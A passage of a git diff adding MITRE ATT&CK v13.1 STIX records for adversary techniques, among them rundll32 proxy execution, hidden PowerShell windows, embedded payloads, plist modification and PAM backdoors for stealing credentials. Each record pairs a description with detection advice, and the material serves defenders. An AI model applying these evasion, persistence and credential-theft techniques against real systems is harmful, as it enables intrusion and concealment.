[Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_contributors": [ + "Gareth Phillips, Seek Ltd.", + "Casey Smith", + "Ricardo Dias", + "James_inthe_box, Me" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\n\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [ + "File: File Metadata", + "Module: Module Load", + "Command: Command Execution", + "Process: Process Creation" + ], + "x_mitre_defense_bypassed": [ + "Digital Certificate Validation", + "Application control", + "Anti-virus" + ], + "type": "attack-pattern", + "id": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "created": "2020-01-23T18:03:46.248Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/011", + "external_id": "T1218.011" + }, + { + "source_name": "rundll32.exe defense evasion", + "description": "Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.", + "url": "https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/" + }, + { + "source_name": "Attackify Rundll32.exe Obscurity", + "description": "Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.", + "url": "https://www.attackify.com/blog/rundll32_execution_order/" + }, + { + "source_name": "This is Security Command Line Confusion", + "description": "B. Ancel. (2014, August 20). Poweliks \u2013 Command Line Confusion. Retrieved March 5, 2018.", + "url": "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/" + }, + { + "source_name": "Github NoRunDll", + "description": "gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.", + "url": "https://github.com/gtworek/PSBits/tree/master/NoRunDll" + }, + { + "source_name": "Trend Micro CPL", + "description": "Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336.json new file mode 100644 index 0000000000000000000000000000000000000000..69750c3c0c151191f4a36b538009130f2e111b68 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--83af10dc-f96a-42a5-9897-7ea55ce2009d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-15T16:08:50.706Z", + "name": "Container and Resource Discovery", + "description": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment\u2019s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary\u2019s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_contributors": [ + "Vishwas Manral, McAfee", + "Center for Threat-Informed Defense (CTID)", + "Yossi Weizman, Azure Defender Research Team" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.\n\nMonitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Container: Container Enumeration", + "Pod: Pod Enumeration" + ], + "type": "attack-pattern", + "id": "attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336", + "created": "2021-03-31T14:26:00.848Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1613", + "external_id": "T1613" + }, + { + "source_name": "Docker API", + "description": "Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.", + "url": "https://docs.docker.com/engine/api/v1.41/" + }, + { + "source_name": "Kubernetes API", + "description": "The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.", + "url": "https://kubernetes.io/docs/concepts/overview/kubernetes-api/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d.json new file mode 100644 index 0000000000000000000000000000000000000000..078e90d4b09e23de5f75856af1cba8af0c59216e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--535122fb-36e3-4321-99d0-62f07de84483", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T21:20:22.578Z", + "name": "Serverless", + "description": "Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.\n\nOnce acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Awake Security" + ], + "x_mitre_data_sources": [ + "Internet Scan: Response Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d", + "created": "2022-07-08T12:39:29.684Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583/007", + "external_id": "T1583.007" + }, + { + "source_name": "AWS Lambda Redirector", + "description": "Adam Chester. (2020, February 25). AWS Lambda Redirector. Retrieved July 8, 2022.", + "url": "https://blog.xpnsec.com/aws-lambda-redirector/" + }, + { + "source_name": "Detecting Command & Control in the Cloud", + "description": "Gary Golomb. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved July 8, 2022.", + "url": "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/" + }, + { + "source_name": "BlackWater Malware Cloudflare Workers", + "description": "Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.", + "url": "https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf.json new file mode 100644 index 0000000000000000000000000000000000000000..6d5c564ef9bbea31c85e5f5ddab653a2a5f77c09 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--99902d16-997d-453e-96ee-56f226d6db4a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Travis Smith, Tripwire" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf", + "type": "attack-pattern", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1143", + "url": "https://attack.mitre.org/techniques/T1143" + }, + { + "source_name": "PowerShell About 2019", + "url": "https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1", + "description": "Wheeler, S. et al.. (2019, May 1). About PowerShell.exe. Retrieved October 11, 2019." + }, + { + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "source_name": "Antiquated Mac Malware" + } + ], + "modified": "2020-03-13T21:03:18.600Z", + "name": "Hidden Window", + "description": "Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.\n\n### Windows\nThere are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\n### Mac\nThe configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be\u00a0apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c.json new file mode 100644 index 0000000000000000000000000000000000000000..5c3add115e17e52ab0d6af93269f1251460dcd56 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--acdf865d-5e24-4e0c-a9c1-9e9a0f260742", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-03T00:31:33.071Z", + "name": "Standard Encoding", + "description": "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "created": "2020-03-14T23:36:52.095Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1132/001", + "external_id": "T1132.001" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "Wikipedia Binary-to-text Encoding", + "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding" + }, + { + "source_name": "Wikipedia Character Encoding", + "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Character_encoding" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1.json new file mode 100644 index 0000000000000000000000000000000000000000..0d2c36e3b4f37364282852ad3057457b65e1bda5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1.json @@ -0,0 +1,92 @@ +{ + "type": "bundle", + "id": "bundle--665ce3f5-0718-486e-a17c-a30c4066fec4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-21T14:40:48.074Z", + "name": "Embedded Payloads", + "description": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) \n\nAdversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) \n\nFor example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) \n\nEmbedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Nick Cairns, @grotezinfosec" + ], + "x_mitre_data_sources": [ + "File: File Creation", + "File: File Metadata" + ], + "x_mitre_system_requirements": [ + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "created": "2022-09-30T18:50:14.351Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/009", + "external_id": "T1027.009" + }, + { + "source_name": "GitHub PSImage", + "description": "Barrett Adams . (n.d.). Invoke-PSImage . Retrieved September 30, 2022.", + "url": "https://github.com/peewpw/Invoke-PSImage" + }, + { + "source_name": "Malware Analysis Report ComRAT", + "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 \u2013 PowerShell Script: ComRAT. Retrieved September 30, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a" + }, + { + "source_name": "Trend Micro", + "description": "Karen Victor. (2020, May 18). Reflective Loading Runs Netwalker Fileless Ransomware. Retrieved September 30, 2022.", + "url": "https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html" + }, + { + "source_name": "Securelist Dtrack2", + "description": "KONSTANTIN ZYKOV. (2019, September 23). Hello! My name is Dtrack. Retrieved September 30, 2022.", + "url": "https://securelist.com/my-name-is-dtrack/93338/" + }, + { + "source_name": "Microsoft Learn", + "description": "Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September 30, 2022.", + "url": "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1" + }, + { + "source_name": "SentinelLabs reversing run-only applescripts 2021", + "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.", + "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" + }, + { + "source_name": "Sentinel Labs", + "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 30, 2022.", + "url": "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--06780952-177c-4247-b978-79c357fb311f.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--06780952-177c-4247-b978-79c357fb311f.json new file mode 100644 index 0000000000000000000000000000000000000000..f5b609f054a6fa5aa1586a6086e0a9cb30daec5d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--06780952-177c-4247-b978-79c357fb311f.json @@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--5530ce5f-129f-4c30-b0d7-6caae3ee9a37", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--06780952-177c-4247-b978-79c357fb311f", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1150", + "url": "https://attack.mitre.org/techniques/T1150" + }, + { + "source_name": "Sofacy Komplex Trojan", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \nAdversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)", + "modified": "2022-04-22T18:49:20.520Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Plist Modification", + "x_mitre_detection": "File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like \"Knock Knock\" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.\n\nMonitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "x_mitre_defense_bypassed": [ + "Application whitelisting", + "Process whitelisting", + "Whitelisting by file name or path" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771.json new file mode 100644 index 0000000000000000000000000000000000000000..aa064580802beaeb521561f6a27ca77cd3ad115e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771.json @@ -0,0 +1,87 @@ +{ + "type": "bundle", + "id": "bundle--2fb137e4-5280-43c5-ace7-13f90990ebdf", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Scott Knight, @sdotknight, VMware Carbon Black", + "George Allen, VMware Carbon Black" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", + "type": "attack-pattern", + "created": "2020-06-26T04:01:09.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1556.003", + "url": "https://attack.mitre.org/techniques/T1556/003" + }, + { + "source_name": "Apple PAM", + "url": "https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt", + "description": "Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020." + }, + { + "source_name": "Man Pam_Unix", + "url": "https://linux.die.net/man/8/pam_unix", + "description": "die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020." + }, + { + "source_name": "Red Hat PAM", + "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules", + "description": "Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020." + }, + { + "source_name": "PAM Backdoor", + "url": "https://github.com/zephrax/linux-pam-backdoor", + "description": "zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June 25, 2020." + }, + { + "source_name": "PAM Creds", + "url": "https://x-c3ll.github.io/posts/PAM-backdoor-DNS/", + "description": "Fern\u00e1ndez, J. M. (2018, June 27). Exfiltrating credentials via PAM backdoors & DNS requests. Retrieved June 26, 2020." + } + ], + "modified": "2021-10-17T14:48:33.580Z", + "name": "Pluggable Authentication Modules", + "description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_detection": "Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nLook for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Creation", + "File: File Modification" + ], + "x_mitre_permissions_required": [ + "root" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1.json new file mode 100644 index 0000000000000000000000000000000000000000..30664ab7925250feac10eabbdbab6bf348a00784 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--c5e0bcef-c92d-41cf-808a-0cadf42ea7d7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Netskope" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", + "type": "attack-pattern", + "created": "2020-06-16T18:42:20.734Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1578.004", + "url": "https://attack.mitre.org/techniques/T1578/004" + }, + { + "source_name": "Tech Republic - Restore AWS Snapshots", + "url": "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/", + "description": 